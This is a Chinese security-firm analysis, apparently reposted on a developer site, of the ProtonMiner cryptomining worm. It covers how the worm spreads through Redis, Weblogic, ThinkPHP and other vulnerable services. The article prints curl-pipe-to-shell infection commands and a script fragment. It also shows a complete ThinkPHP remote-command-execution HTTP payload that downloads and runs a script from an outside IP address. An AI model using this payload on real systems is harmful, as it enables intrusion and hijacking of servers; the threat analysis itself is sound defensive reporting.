内容简介:区块链安全咨询公司曲速未来表示:近日,有机构监测到一种挖矿蠕虫,正在互联网上加速传播,本文为作者“曲速未来安全区”,原创文章,转载时请保留本声明及附带文章链接。 内容仅供读者参考,并非投资建议,本网站将保留所有法律权益。
2019-03-05 18:05 区块链 技术
2485 收藏
区块链安全咨询公司曲速未来表示:近日,有机构监测到一种挖矿蠕虫,正在互联网上加速传播,
背景
区块链安全咨询公司 曲速未来 表示:近日,有机构监测到一种挖矿蠕虫,正在互联网上加速传播,并根据它使用ProtonMail邮箱地址作为矿池用户名的行为,将其命名为ProtonMiner。
据分析,这种蠕虫与TrendMicro于2018年12月曾报导过的“利用ElasticSearch旧漏洞传播的蠕虫”非常相似,可能是同一团伙所为。但与先前报导不同的是,二月中旬,该挖矿蠕虫扩大了攻击面,从仅攻击ElasticSearch这一种服务,变为攻击包括Redis, Weblogic在内的多种服务,传播速度大大加快。
本文着重描写该挖矿僵尸网络的传播手法,并在文末列出了安全建议,以帮助用户避免遭受感染,或在已被感染的情况下进行清理。
感染路径
攻击者先控制被感染主机执行以下两条命令之一,从而下载并运行uuu.sh。
/bin/bash -c curl -fsSL |sh
/bin/bash -c curl -fsSL |sh
而uuu.sh脚本运行后,将继续下载挖矿程序和配置文件用于挖矿,以及下载蠕虫木马用于继续攻击未感染主机。
“谨慎”的入侵脚本
入侵脚本uuu.sh,首先会通过试着写入”/etc/devtools”目录,来判断当前账户是否拥有root权限;脚本的大部分功能,只有当前账号具有root权限时才会运行。
#!/bin/sh
echo 1 > /etc/devtools
if [ -f "$rtdir" ]
then
echo "i am root"
echo "goto 1" >> /etc/devtools
# download & attack
fi
该脚本具有典型挖矿事件中恶意脚本的特征:检查并杀死其他僵尸网络的进程、将自身写入系统crontab文件、修改iptables设置从而允许某些端口上的通信等。然而这一脚本的作者或许更加谨慎:
1. 在脚本最后,攻击者清空了命令历史记录
2. 在挖矿配置文件中,攻击者使用了多个ProtonMail邮箱地址作为连接到矿池的用户名。
ProtonMail是世界最大的安全邮件服务提供商,ProtonMiner也是因此而得名。这种使用邮箱地址,而非门罗币钱包地址作为矿池用户名的做法很好地“保护”了攻击者的隐私,也为安全工作者们判断该僵尸网络的规模和收益情况增加了难度。
传播分析
ProtonMiner的横向传播程序名为”systemctI”,是一个由 Go 语言编译的程序。它的main函数如下图所示:
该程序在运行时,会首先通过_tmp_exe_linx_ipc_Init_ip等方法对要扫描的ip和使用的弱密码进行初始化。过程中会请求并下载以下两个地址的文件。
(ip地址c段列表)
(弱密码列表)
之后程序会进入main_Scan函数,该函数包含大量的扫描和漏洞利用相关子函数。
下表列出了受到该挖矿僵尸网络影响的服务和漏洞:
服务 漏洞 Hadoop 未授权访问 Drupal CVE-2018-7600 Redis 未授权访问 Spring Data Commons CVE-2018-1273 SQL Server 弱密码 Elastic Search CVE-2014-3120CVE-2015-1427 Weblogic CVE-2017-10271 ThinkPHP 两种远程命令执行漏洞,包括 CVE-2018-20062
例如一个ThinkPHP 的payload:
POST /index.php?s=captcha HTTP/1.1 Host:
*.*.*.* User-Agent:
Go-http-client/1.1 Content-Length:132 Connection:
close Content-Type:
application/x-www-form-urlencoded Accept-Encoding:gzip _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=url -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
ProtonMiner僵尸网络扩大攻击面之后,传播速度有了显著的提升。从下图可以看出,进入2月份以来,攻击量快速上升,并在2月中旬达到高峰,阿里云观察到已有上千台主机受到感染:
安全建议
区块链安全咨询公司 曲速未来 表示:不要用root账户启动数据库、网站服务器等服务,因为root启动的服务一旦被成功入侵,攻击者将拥有被入侵主机的所有权限。此外,像Redis和Hadoop这些主要是内部使用的服务,不应暴露在公网上。挖矿僵尸网络更新速度非常快,它们部分导致了互联网上无处不在的威胁。
本文内容由 曲速未来 (WarpFuture.com) 安全咨询公司整理编译,转载请注明。 曲速未来提供包括主链安全、交易所安全、交易所钱包安全、DAPP开发安全、智能合约开发安全等相关区块链安全咨询服务。
本文为作者“曲速未来安全区”,原创文章,转载时请保留本声明及附带文章链接。 内容仅供读者参考,并非投资建议,本网站将保留所有法律权益。
以上所述就是小编给大家介绍的《曲速未来 透露:ProtonMiner挖矿蠕虫扩大攻击面加速传播》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 曲速未来 透露:恶意软件之自我保护方法
- Edge 开发团队透露更多细节:兼容 Chrome 扩展
- 16625份AI论文透露:深度学习正在走向终点?
- Python 之父透露退位隐情,与核心开发团队产生隔阂
- 曲速未来 透露:区块链应用正面临攻击者威胁
- Firefox 安卓版进入维护模式,开发团队透露在憋大招
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Cyberwar
Kathleen Hall Jamieson / Oxford University Press / 2018-10-3 / USD 16.96
The question of how Donald Trump won the 2016 election looms over his presidency. In particular, were the 78,000 voters who gave him an Electoral College victory affected by the Russian trolls and hac......一起来看看 《Cyberwar》 这本书的介绍吧!
